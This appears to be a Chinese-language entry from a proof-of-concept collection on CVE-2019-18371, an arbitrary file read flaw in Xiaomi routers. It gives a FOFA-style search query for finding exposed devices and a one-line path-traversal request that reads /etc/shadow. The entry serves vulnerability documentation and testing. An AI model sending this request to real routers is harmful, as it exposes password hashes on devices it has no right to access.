Awesome-POC/网络设备漏洞/小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371.md

31 lines
468 B
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# 小米 路由器 extdisks 任意文件读取漏洞 CVE-2019-18371
## 漏洞描述
小米 路由器存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器敏感信息
## 漏洞影响
```
小米 路由器
```
## 网络测绘
```
app="小米路由器"
```
## 漏洞复现
登录页面
![image-20220715110456566](images/202207151106569.png)
验证POC
```
/api-third-party/download/extdisks../etc/shadow
```
![](images/202207151106800.png)